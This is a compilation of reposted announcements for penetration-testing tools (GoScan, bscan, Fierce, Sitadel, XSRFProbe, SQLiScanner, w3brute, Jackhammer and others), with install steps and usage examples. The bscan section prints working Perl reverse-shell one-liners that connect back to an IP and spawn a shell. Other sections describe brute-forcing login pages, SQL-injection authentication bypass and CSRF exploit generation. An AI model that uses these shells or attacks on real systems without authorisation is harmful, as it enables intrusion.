Goscan – Interactive Network Scanner

GoScan is an interactive network scanner client, featuring auto-completion, which provides abstraction and automation over nmap.

Although it started as a small side-project I developed in order to learn @golang, GoScan can now be used to perform host discovery, port scanning, and service enumeration not only in situations where being stealthy is not a priority and time is limited (think of CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements.

GoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of "screen", etc.), given that it fires scans and maintains their state in an SQLite database. Scans run in the background (detached from the main thread), so even if connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong.

In addition, the Service Enumeration phase integrates a collection of other tools (e.g., EyeWitness, Hydra, nikto, etc.), each one tailored to target a specific service.

Installation

Binary installation (Recommended)

Binaries are available from the Release page.

    # Linux (64bit)
    $ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_amd64.zip
    $ unzip goscan_2.1_linux_amd64.zip

    # Linux (32bit)
    $ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_386.zip
    $ unzip goscan_2.1_linux_386.zip

    # After that, place the executable in your PATH
    $ chmod +x goscan
    $ sudo mv ./goscan /usr/local/bin/goscan

Build from source

    $ git clone https://github.com/marco-lancini/goscan.git
    $ cd goscan/goscan/
    $ make setup
    $ make build

To create a multi-platform binary, use the cross command via make:

    $ make cross

Docker

    $ git clone https://github.com/marco-lancini/goscan.git
    $ cd goscan/
    $ docker-compose up --build

Usage

GoScan supports all the main steps of network enumeration:

1. Load targets
- Add a single target via the CLI (must be a /32): load target SINGLE
- Upload multiple targets from a text file or folder: load target MULTI <path-to-file>

2. Host Discovery
- Perform a Ping Sweep: sweep <TYPE> <TARGET>
- Or load results from a previous discovery:
  - Add a single alive host via the CLI (must be a /32): load alive SINGLE <IP>
  - Upload multiple alive hosts from a text file or folder: load alive MULTI <path-to-file>

3. Port Scanning
- Perform a port scan: portscan <TYPE> <TARGET>
- Or upload nmap results from XML files or folder: load portscan <path-to-file>

4. Service Enumeration
- Dry Run (only show commands, without performing them): enumerate <TYPE> DRY <TARGET>
- Perform enumeration of detected services: enumerate <TYPE> <POLITE/AGGRESSIVE> <TARGET>

5. Special Scans
- EyeWitness
  - Take screenshots of websites, RDP services, and open VNC servers (KALI ONLY): special eyewitness
  - EyeWitness.py needs to be in the system path
- Extract (Windows) domain information from enumeration data
  - special domain <users/hosts/servers>
- DNS
  - Enumerate DNS (nmap, dnsrecon, dnsenum): special dns DISCOVERY <domain>
  - Bruteforce DNS: special dns BRUTEFORCE <domain>
  - Reverse Bruteforce DNS: special dns BRUTEFORCE_REVERSE <domain> <base_IP>

Utils
- Show results: show <targets/hosts/ports>
- Change the output folder (by default ~/goscan): set output_folder <PATH>
- Modify the default nmap switches: set nmap_switches <SWEEP/TCP_FULL/TCP_STANDARD/TCP_VULN/UDP_STANDARD> <SWITCHES>
- Modify the default wordlists: set_wordlists <FINGER_USER/FTP_USER/…> <PATH>

External Integrations

The Service Enumeration phase currently supports the following integrations:

WHAT: INTEGRATION
- ARP: nmap
- DNS: nmap, dnsrecon, dnsenum, host
- FINGER: nmap, finger-user-enum
- FTP: nmap, ftp-user-enum, hydra [AGGRESSIVE]
- HTTP: nmap, nikto, dirb, EyeWitness, sqlmap [AGGRESSIVE], fimap [AGGRESSIVE]
- RDP: nmap, EyeWitness
- SMB: nmap, enum4linux, nbtscan, samrdump
- SMTP: nmap, smtp-user-enum
- SNMP: nmap, snmpcheck, onesixtyone, snmpwalk
- SSH: hydra [AGGRESSIVE]
- SQL: nmap
- VNC: EyeWitness

Link: http://feedproxy.google.com/~r/PentestTools/~3/uz1Ra9_76sE/goscan-interactive-network-scanner.html

Bscan – An Asynchronous Target Enumeration Tool

Synopsis

bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.

Installation

bscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.

Download the latest packaged version from PyPI:

    pip install bscan

Or get the bleeding-edge version from version control:

    pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage

bscan has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:

    $ bscan \
    > --max-concurrency 3 \
    > --patterns [Mm]icrosoft \
    > --status-interval 10 \
    > --verbose-status \
    > scanme.nmap.org

What's going on here?

- --max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time
- --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
- --status-interval 10 tells bscan to print runtime status updates every 10 seconds
- --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
- scanme.nmap.org is the host upon which we want to enumerate

bscan also relies on some additional configuration files. The default files can be found in the bscan/configuration directory and serve the following purposes:

- patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
- required-programs.txt specifies the installed programs that bscan plans on using
- port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
- service-scans.toml defines the scans to be run on the target(s) on a per-service basis

Detailed Options

Here's what you should see when running bscan --help:

    usage: bscan [OPTIONS] targets

    an asynchronous service enumeration tool

    positional arguments:
      targets               the targets and/or networks on which to perform
                            enumeration

    optional arguments:
      -h, --help            show this help message and exit
      --brute-pass-list F   filename of password list to use for brute-forcing
      --brute-user-list F   filename of user list to use for brute-forcing
      --cmd-print-width I   the maximum integer number of characters allowed
                            when printing the command used to spawn a running
                            subprocess (defaults to 80)
      --config-dir D        the base directory from which to load the
                            configuration files; required configuration files
                            missing from this directory will instead be loaded
                            from the default files shipped with this program
      --hard                force overwrite of existing directories
      --max-concurrency I   maximum integer number of subprocesses permitted to
                            be running concurrently (defaults to 20)
      --no-program-check    disable checking the presence of required system
                            programs
      --no-file-check       disable checking the presence of files such as
                            configured wordlists
      --no-service-scans    disable running scans on discovered services
      --output-dir D        the base directory in which to write output files
      --patterns [ [ …]]    regex patterns to highlight in output text
      --ping-sweep          enable ping sweep filtering of hosts from a network
                            range before running more intensive scans
      --quick-only          whether to only run the quick scan (and not include
                            the thorough scan over all ports)
      --qs-method S         the method for performing the initial TCP port
                            scan; must correspond to a configured port scan
      --status-interval I   integer number of seconds to pause in between
                            printing status updates; a non-positive value
                            disables updates (defaults to 30)
      --ts-method S         the method for performing the thorough TCP port
                            scan; must correspond to a configured port scan
      --udp                 whether to run UDP scans
      --udp-method S        the method for performing the UDP port scan; must
                            correspond to a configured port scan
      --verbose-status      whether to print verbose runtime status updates,
                            based on frequency specified by `--status-interval`
                            flag
      --version             program version
      --web-word-list F     the wordlist to use for scans

Companion Tools

The main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.

bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:

    $ bscan-wordlists --find "*win*"
    /usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
    /usr/share/wordlists/metasploit/sensitive_files_win.txt
    /usr/share/seclists/Passwords/common-passwords-win.txt

Try bscan-wordlists --help to explore other options.

bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:

    $ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
    perl for windows
    perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
    perl with /bin/sh
    perl -e ‘use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
    perl without /bin/sh
    perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.

Development

Start by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):

    # setup the environment
    mkvirtualenv -p $(which python3) bscan-dev
    workon bscan-dev

    # get the deps
    pip install -r dev-requirements.txt

Lint and type-check the project (these are run on Travis, too):

    flake8 . && mypy bscan

When it's time to package a new release:

    # build source and wheel distributions
    python setup.py bdist_wheel sdist

    # run post-build checks
    twine check dist/*

    # upload to PyPI
    twine upload dist/*

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

Fierce – Semi-Lightweight Scanner That Helps Locate Non-Contiguous IP Space And Hostnames Against Specified Domains

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains.

It's really meant as a precursor to nmap, unicornscan, nessus, nikto, etc., since all of those require that you already know what IP space you are looking for.

This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network.

Because it uses DNS primarily you will often find mis-configured networks that leak internal address space. That's especially useful in targeted malware.

Options:

-connect  Attempt to make http connections to any non RFC1918 (public) addresses. This will output the return headers but be warned, this could take a long time against a company with many targets, depending on network/machine lag. I wouldn't recommend doing this unless it's a small company or you have a lot of free time on your hands (could take hours-days). Inside the file specified the text "Host:\n" will be replaced by the host specified. Usage:

    perl fierce.pl -dns example.com -connect headers.txt

-delay  The number of seconds to wait between lookups.

-dns  The domain you would like scanned.

-dnsfile  Use DNS servers provided by a file (one per line) for reverse lookups (brute force).

-dnsserver  Use a particular DNS server for reverse lookups (probably should be the DNS server of the target). Fierce uses your DNS server for the initial SOA query and then uses the target's DNS server for all additional queries by default.

-file  A file you would like to output to be logged to.

-fulloutput  When combined with -connect this will output everything the webserver sends back, not just the HTTP headers.

-help  This screen.

-nopattern  Don't use a search pattern when looking for nearby hosts. Instead dump everything. This is really noisy but is useful for finding other domains that spammers might be using. It will also give you lots of false positives, especially on large domains.

-range  Scan an internal IP range (must be combined with -dnsserver). Note, that this does not support a pattern and will simply output anything it finds. Usage:

    perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co

-search  Search list. When fierce attempts to traverse up and down ipspace it may encounter other servers within other domains that may belong to the same company. If you supply a comma delimited list to fierce it will report anything found. This is especially useful if the corporate servers are named different from the public facing website. Usage:

    perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany

Note that using search could also greatly expand the number of hosts found, as it will continue to traverse once it locates servers that you specified in your search list. The more the better.

-suppress  Suppress all TTY output (when combined with -file).

-tcptimeout  Specify a different timeout (default 10 seconds). You may want to increase this if the DNS server you are querying is slow or has a lot of network lag.

-threads  Specify how many threads to use while scanning (default is single threaded).

-traverse  Specify a number of IPs above and below whatever IP you have found to look for nearby IPs. Default is 5 above and below. Traverse will not move into other C blocks.

-version  Output the version number.

-wide  Scan the entire class C after finding any matching hostnames in that class C. This generates a lot more traffic but can uncover a lot more information.

-wordlist  Use a separate wordlist (one word per line). Usage:

    perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt

fierce Usage Example

    root@kali:~# fierce -dns example.com
    DNS Servers for example.com:
        b.iana-servers.net
        a.iana-servers.net

    Trying zone transfer first…
        Testing b.iana-servers.net
            Request timed out or transfer not allowed.
        Testing a.iana-servers.net
            Request timed out or transfer not allowed.

    Unsuccessful in zone transfer (it was worth a shot)
    Okay, trying the good old fashioned way… brute force

    Checking for wildcard DNS…
    Nope. Good.
    Now performing 2280 test(s)…

Link: http://feedproxy.google.com/~r/PentestTools/~3/X8Fc7tY8OFI/fierce-semi-lightweight-scanner-that.html

Scanner-Cli – A Project Security/Vulnerability/Risk Scanning Tool

The Hawkeye scanner-cli is a project security, vulnerability and general risk highlighting tool. It is meant to be integrated into your pre-commit hooks and your pipelines.

Running and configuring the scanner

The Hawkeye scanner-cli assumes that your directory structure is such that it keeps the toolchain's files on top level. Roughly, this is what it boils down to:

- Node.js projects have a package.json on top level
- Ruby projects will have a Gemfile on top level
- Python projects will have a requirements.txt on top level
- PHP projects will have a composer.lock on top level
- Java projects will have a build (gradle) or target (maven) folder, and include .java and .jar files

This is not exhaustive as sometimes tools require further files to exist. To understand how the modules decide whether they can handle a project, please check the How it works section and the modules folder.

Docker (recommended)

The docker image is hands-down the easiest way to run the scanner. Please note that your project root (e.g. $PWD) needs to be mounted to /target.

    docker run --rm -v $PWD:/target hawkeyesec/scanner-cli

The docker build is also the recommended way to run the scanner in your CI pipelines. This is an example of running Hawkeye against one of your projects in GoCD:

Link: http://feedproxy.google.com/~r/PentestTools/~3/JoL8_BBnrhQ/scanner-cli-project-securityvulnerabili.html

Htcap – A Web Application Scanner Able To Crawl Single Page Application (SPA) In A Recursive Manner By Intercepting Ajax Calls And DOM Changes

Htcap is a web application scanner able to crawl single page applications (SPA) in a recursive manner by intercepting ajax calls and DOM changes. Htcap is not just another vulnerability scanner, since it is focused on the crawling process and aims to detect and intercept ajax/fetch calls, websockets, jsonp, etc. It uses its own fuzzers plus a set of external tools to discover vulnerabilities, and it is designed to be a tool for both manual and automated penetration tests of modern web applications.

It also features a small but powerful framework to quickly develop custom fuzzers with less than 60 lines of python. The fuzzers can work with GET/POST data, XML and JSON payloads and switch between POST and GET. Of course, fuzzers run in parallel in a multi-threaded environment.

This is the very first release that uses headless chrome instead of phantomjs. Htcap's Javascript crawling engine has been rewritten to take advantage of the new async/await features of ecmascript and has been converted to a nodejs module built on top of Puppeteer.

More info at htcap.org.

SETUP

Requirements

- Python 2.7
- Nodejs and npm
- Sqlmap (for sqlmap scanner module)
- Arachni (for arachni scanner module)

Download and Run

    $ git clone https://github.com/fcavallarin/htcap.git htcap
    $ htcap/htcap.py

DOCUMENTATION

Documentation, examples and demos can be found at the official website https://htcap.org.

Link: http://feedproxy.google.com/~r/PentestTools/~3/aJgXuqnKFus/htcap-web-application-scanner-able-to.html

Sitadel – Web Application Security Scanner

Sitadel is basically an update for WAScan, making it compatible with python >= 3.4. It allows more flexibility for you to write new modules and implement new features:

- Frontend framework detection
- Content Delivery Network detection
- Define Risk Level to allow for scans
- Plugin system
- Docker image available to build and run

Installation

    $ git clone https://github.com/shenril/Sitadel.git
    $ cd Sitadel
    $ pip install .
    $ python sitadel.py --help

Features

- Fingerprints
  - Server
  - Web Frameworks (CakePHP,CherryPy,…)
  - Frontend Frameworks (AngularJS,MeteorJS,VueJS,…)
  - Web Application Firewall (Waf)
  - Content Management System (CMS)
  - Operating System (Linux,Unix,..)
  - Language (PHP,Ruby,…)
  - Cookie Security
  - Content Delivery Networks (CDN)
- Attacks:
  - Bruteforce
    - Admin Interface
    - Common Backdoors
    - Common Backup Directory
    - Common Backup File
    - Common Directory
    - Common File
    - Log File
  - Injection
    - HTML Injection
    - SQL Injection
    - LDAP Injection
    - XPath Injection
    - Cross Site Scripting (XSS)
    - Remote File Inclusion (RFI)
    - PHP Code Injection
  - Other
    - HTTP Allow Methods
    - HTML Object
    - Multiple Index
    - Robots Paths
    - Web Dav
    - Cross Site Tracing (XST)
    - PHPINFO
    - .Listing
  - Vulnerabilities
    - ShellShock
    - Anonymous Cipher (CVE-2007-1858)
    - Crime (SPDY) (CVE-2012-4929)
    - Struts-Shock

Example

Simple run

    python sitadel http://website.com

Run with risk level at DANGEROUS and do not follow redirections

    python sitadel http://website.com -r 2 --no-redirect

Run specific modules only and full verbosity

    python sitadel http://website.com -a admin backdoor -f header server -vvv

Run with docker

    docker build -t sitadel .
    docker run sitadel http://example.com

Link: http://feedproxy.google.com/~r/PentestTools/~3/zfPWuXefLsw/sitadel-web-application-security-scanner.html

XSRFProbe – The Prime Cross Site Request Forgery Audit And Exploitation Toolkit

XSRFProbe is an advanced Cross Site Request Forgery (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a Powerful Crawling Engine and Numerous Systematic Checks, it is now able to detect most cases of CSRF vulnerabilities, their related bypasses and further generate (maliciously) exploitable proof of concepts with each found vulnerability. For more info on how XSRFProbe works, see XSRFProbe Internals on wiki.

Some Features:

- Performs several types of checks before declaring an endpoint as vulnerable.
- Can detect several types of Anti-CSRF tokens in POST requests.
- Features a powerful crawler which features continuous crawling and scanning.
- Out of the box support for custom cookie values and generic headers.
- Accurate Token-Strength Detection and Analysis using various algorithms.
- Can generate both normal as well as maliciously exploitable CSRF PoCs.
- Follows a redirect when there is a 30x response.
- Well documented code and highly generalised automated workflow.
- The user is in control of everything whatever the scanner does.
- Has a user-friendly interaction environment with full verbose support.
- Detailed logging system of errors, vulnerabilities, tokens and other stuff.

Warnings:

Do not use this tool on a live site!

It is because this tool is designed to perform all kinds of form submissions automatically which can sabotage the site. Sometimes you may screw up the database and most probably perform a DoS on the site as well.

Test on a disposable/dummy setup/site!

Disclaimer:

Usage of XSRFProbe for testing websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. The author assumes no liability and is not exclusively responsible for any misuse or damage caused by this program.

Author's Words:

This project is based entirely upon my own research and my own experience with web applications on Cross-Site Request Forgery attacks. You can try going through the source code which is highly documented to help you understand how this toolkit was built. Useful pull requests, ideas and issues are highly welcome. If you wish to see how XSRFProbe is being developed, check out the Development Board.

That's it, folks. Thank you…

Copyright © Infected Drake

Link: http://feedproxy.google.com/~r/PentestTools/~3/vfUYJMB8ObI/xsrfprobe-prime-cross-site-request.html

SQLiScanner – Automatic SQL Injection With Charles And Sqlmap API

Automatic SQL injection with Charles and sqlmapapi

Dependencies

- Django
- PostgreSQL
- Celery
- sqlmap
- redis

Supported platforms

- Linux
- osx

Installation

Preferably, you can download SQLiScanner by cloning the Git repository:

    git clone https://github.com/0xbug/SQLiScanner.git --depth 1

You can download sqlmap by cloning the Git repository:

    git clone https://github.com/sqlmapproject/sqlmap.git --depth 1

SQLiScanner works with Python version 3.x on Linux and osx.

Create virtualenv and install requirements

    cd SQLiScanner/
    virtualenv --python=/usr/local/bin/python3.5 venv
    source venv/bin/activate
    pip install -r requirements.txt

Setting

DATABASES Setting

SQLiScanner/settings.py:85

    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.postgresql',
            'NAME': '',
            'USER': '',
            'PASSWORD': '',
            'HOST': '127.0.0.1',
            'PORT': '5432',
        }
    }

SendEmail Setting

SQLiScanner/settings.py:158

    # Email
    EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
    EMAIL_USE_TLS = False
    EMAIL_HOST = ''
    EMAIL_PORT = 25
    EMAIL_HOST_USER = ''
    EMAIL_HOST_PASSWORD = ''
    DEFAULT_FROM_EMAIL = ''

scanner/tasks.py:14

    class SqlScanTask(object):
        def __init__(self, sqli_obj):
            self.api_url = "http://127.0.0.1:8775"
            self.mail_from = ""
            self.mail_to = [""]

Syncdb

    python manage.py makemigrations scanner
    python manage.py migrate

Create superuser

    python manage.py createsuperuser

Run

    redis-server
    python sqlmapapi.py -s -p 8775
    python manage.py celery worker --loglevel=info
    python manage.py runserver

Link: http://www.kitploit.com/2018/12/sqliscanner-automatic-sql-injection.html

W3Brute – Automatic Web Application Brute Force Attack Tool

w3brute is an open source penetration testing tool that automates attacks directly to the website's login page. w3brute is also supported for carrying out brute force attacks on all websites.

Features

Scanner:

w3brute has a scanner feature that serves to support the bruteforce attack process. This is a list of available scanners:

- automatically detects target authentication type.
- admin page scanner.
- SQL injection vulnerability scanner.

Attack Method:

w3brute can attack using various methods of attack. This is a list of available attack methods:

- SQL injection bypass authentication
- mixed credentials (username + SQL injection queries)

Support:

- multiple target
- google dorking
- a list of supported web interface types to attack:
  - web shell
  - HTTP 401 UNAUTHORIZED (Basic and Digest)
- create file results brute force attack. supported file format type:
  - CSV (default)
  - HTML
  - SQLITE3
- custom credentials (username, password, domain) (supported zip file)
- custom HTTP requests (User-Agent, timeout, etc)
- and much more…

Installation

You can download the latest version of the tarball file here or zipball here. If you have installed the git package, you can clone the Git repository as below:

    git clone https://github.com/aprilahijriyan/w3brute.git

w3brute can be run with Python version 2.6.x or 2.7.x on all platforms.

Usage

To get the list of all options of the w3brute tool:

    python w3brute.py -h

Examples:

    # basic usage
    $ python w3brute.py -t http://www.example.com/admin/login.php

    # look for the admin page
    $ python w3brute.py -t http://www.example.com/ --admin

    # uses a password file zip list. (syntax => <;filename>[:password])
    $ python w3brute.py -t http://www.example.com/ --admin -u admin -p /path/to/file.zip;filename.txt # (if the file is encrypted: /path/to/file.zip;filename.txt:password)

    # slice the password from the list. (syntax => <start>[:stop][:step])
    $ python w3brute.py -t http://www.example.com/ --admin -u admin -sP 20000

Links

- Download: .tar.gz or .zip
- Issue tracker: https://github.com/aprilahijriyan/w3brute/issues

Link: http://www.kitploit.com/2018/12/w3brute-automatic-web-application-brute.html

Jackhammer – One Security Vulnerability Assessment/Management Tool To Solve All The Security Team Problems

One Security vulnerability assessment/management tool to solve all the security team problems.

What is Jackhammer?

Jackhammer is a collaboration tool built with the aim of bridging the gap between the Security team and the dev and QA teams, and of being a facilitator for TPMs to understand and track the quality of the code going into production. It can do static code analysis and dynamic analysis with inbuilt vulnerability management capability. It finds security vulnerabilities in the target applications and it helps security teams to manage the chaos in this new age of continuous integration and continuous/multiple deployments.

It works completely on RBAC (Role Based Access Control). There are cool dashboards for individual scans and team scans, giving ample flexibility to collaborate with different teams. It is totally built on a pluggable architecture which can be integrated with any open source/commercial tool.

Jackhammer uses the OWASP pipeline project to run multiple open source and commercial tools against your code, web app, mobile app, cms (wordpress), network.

Key Features:

- Provides unified interface to collaborate on findings
- Scanning (code) can be done for all code management repositories
- Scheduling of scans based on intervals # daily, weekly, monthly
- Advanced false positive filtering
- Publish vulnerabilities to bug tracking systems
- Keep a tab on statistics and vulnerability trends in your applications
- Integrates with majority of open source and commercial scanning tools
- Users and Roles management giving greater control
- Configurable severity levels on list of findings across the applications
- Built-in vulnerability status progression
- Easy to use filters to review targeted sets from tons of vulnerabilities
- Asynchronous scanning (via sidekiq) that scales
- Seamless Vulnerability Management
- Track statistics and graph security trends in your applications
- Easily integrates with a variety of open source, commercial and custom scanning tools

Supported Vulnerability Scanners:

Static Analysis:

- Brakeman
- Bundler-Audit
- Checkmarx**
- Dawnscanner
- FindSecurityBugs
- Xanitizer*
- NodeSecurityProject
- PMD
- Retire.js

\* license required
\*\* commercial license required

Finding hard coded secrets/tokens/creds:

- Trufflehog (Slightly modified/extended for better result and integration as of May 2017)

Webapp:

- Arachni

Mobile App:

- Androbugs (Slightly modified/extended for better result and integration as of May 2017)
- Androguard (Slightly modified/extended for better result and integration as of May 2017)

Wordpress:

- WPScan (Slightly modified/extended for better result and integration as of May 2017)

Network:

- Nmap

Adding Custom (other open source/commercial/personal) Scanners:

You can add any scanner to jackhammer within 10-30 minutes. Check the links/video.

Quick Start and Installation

See our Quick Start/Installation Guide if you want to try out Jackhammer as quickly as possible using Docker Compose.

Run the following commands for local setup (corporate mode):

    git clone https://github.com/olacabs/jackhammer
    sh ./docker-build.sh

Default credentials for local setup:

    username: jackhammer@olacabs.com
    password: j4ckh4mm3r

(For single user mode)

    sh ./docker-build.sh SingleUser

do signup for access

Restarting Jackhammer

    docker-compose stop
    docker-compose rm
    docker-compose up -d

User Guide

The User Guide will give you an overview of how to use Jackhammer once you have things up and running.

Demo

Demo Environment Link: https://jch.olacabs.com/

Default credentials:

    username: admin@admin.com
    password: admin@admin.com

Credits

Sentinels Team @Ola

Shout-out to:

- Madhu
- Habi
- Krishna
- Shreyas
- Krutarth
- Naveen
- Mohan

Link: http://feedproxy.google.com/~r/PentestTools/~3/n25aLXiISAg/jackhammer-one-security-vulnerability.html